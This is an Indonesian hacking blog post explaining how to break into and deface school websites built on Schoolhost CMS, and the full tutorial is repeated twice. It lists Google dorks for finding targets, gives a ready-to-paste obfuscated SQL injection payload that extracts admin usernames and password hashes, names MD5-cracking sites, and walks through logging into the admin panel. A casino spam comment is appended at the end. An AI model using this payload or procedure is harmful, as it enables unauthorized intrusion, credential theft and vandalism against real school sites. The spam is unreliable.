Assalamualikum Wr.Wb Hallo guys kembali lagi bersama saya JonathanDerz,diartikel kali ini saya akan ngasih materi tentang cara deface Po...
Assalamualikum Wr.Wb
Hallo guys kembali lagi bersama saya JonathanDerz,diartikel kali ini saya akan ngasih materi tentang cara deface Poc Host CMS School Sqli,ok langsung aja ketutorialnya tanpa basa basi:
Bahan
1. Dork
# inurl: "/? p = info" situs: id
# inurl: "/? p = detberita"
# inurl: "/? p = guru" situs: id
# inurl:/?p=bukutamu
# intext:Schoolhos Free Open Source CMS
Kembangkan , jangan manja , gunakan otak kalian !
2. Sql Exploit
' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
3. MD5 hash
www.md5online.org/
https://hashkiller.co.uk/
md5 cracker.org/
www.md5hashgenerator.com/
Langkah Tutorial
1. Dorking di GOOGLE
cari terus , jangan malas
2. pilih target
3. masukan exploit
ex: www.target.domain/ ? p = detberita & id = 5' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+--
4.kalo vuln maka akan seperti ini
disamping user ada angka angka Contoh admin30017008 hiraukan saja
5. Copy MD5 hash tadi , buka MD5 decrypter, masukan di situ , submit
6. login ke page admin nya : http://terget.domain/adminpanel
masukan user dan password
selesai ..
mau tanam shell ? tunggu post berikutnya
Catatan : Perlu di ingat cms ini digunakan banyak sekolah , saya mohon jangan mendeface situs situs sekolah , apalagi sampai tembas index, terus dimasukin archive
pengen tenar ? pengen di puji ? lo cari ilmu apa cari muka ! kalo pengen tenar buat tool jangan merusak
gsk usah show off defacean , admin tidak bertanggung jawab jika ada masalah
Ok itu saja tutorial kali ini,semoga bermanfaat,jangan lupa untuk klik subscribe web derzgrub dibawah dengan ketik email kamu,dan jangan lupa klik follow instagram kami di@derzgrub_ind,sekian terima kasih
Wassalamualaikum Wr.Wb
Bahan
1. Dork
# inurl: "/? p = info" situs: id
# inurl: "/? p = detberita"
# inurl: "/? p = guru" situs: id
# inurl:/?p=bukutamu
# intext:Schoolhos Free Open Source CMS
Kembangkan , jangan manja , gunakan otak kalian !
2. Sql Exploit
' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
3. MD5 hash
www.md5online.org/
https://hashkiller.co.uk/
md5 cracker.org/
www.md5hashgenerator.com/
Langkah Tutorial
1. Dorking di GOOGLE
cari terus , jangan malas
2. pilih target
3. masukan exploit
ex: www.target.domain/ ? p = detberita & id = 5' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+--
4.kalo vuln maka akan seperti ini
disamping user ada angka angka Contoh admin30017008 hiraukan saja
5. Copy MD5 hash tadi , buka MD5 decrypter, masukan di situ , submit
6. login ke page admin nya : http://terget.domain/adminpanel
masukan user dan password
selesai ..
mau tanam shell ? tunggu post berikutnya
Catatan : Perlu di ingat cms ini digunakan banyak sekolah , saya mohon jangan mendeface situs situs sekolah , apalagi sampai tembas index, terus dimasukin archive
pengen tenar ? pengen di puji ? lo cari ilmu apa cari muka ! kalo pengen tenar buat tool jangan merusak
gsk usah show off defacean , admin tidak bertanggung jawab jika ada masalah
Ok itu saja tutorial kali ini,semoga bermanfaat,jangan lupa untuk klik subscribe web derzgrub dibawah dengan ketik email kamu,dan jangan lupa klik follow instagram kami di@derzgrub_ind,sekian terima kasih
Wassalamualaikum Wr.Wb
Casino Bonus Codes - December 2021
ReplyDeleteNo sol.edu.kg deposit titanium ring bonus casino wooricasinos.info promotions. We recommend 2021 casino bonus codes and promos for new poormansguidetocasinogambling.com players. We also list new nba매니아 casino bonuses for December 2021.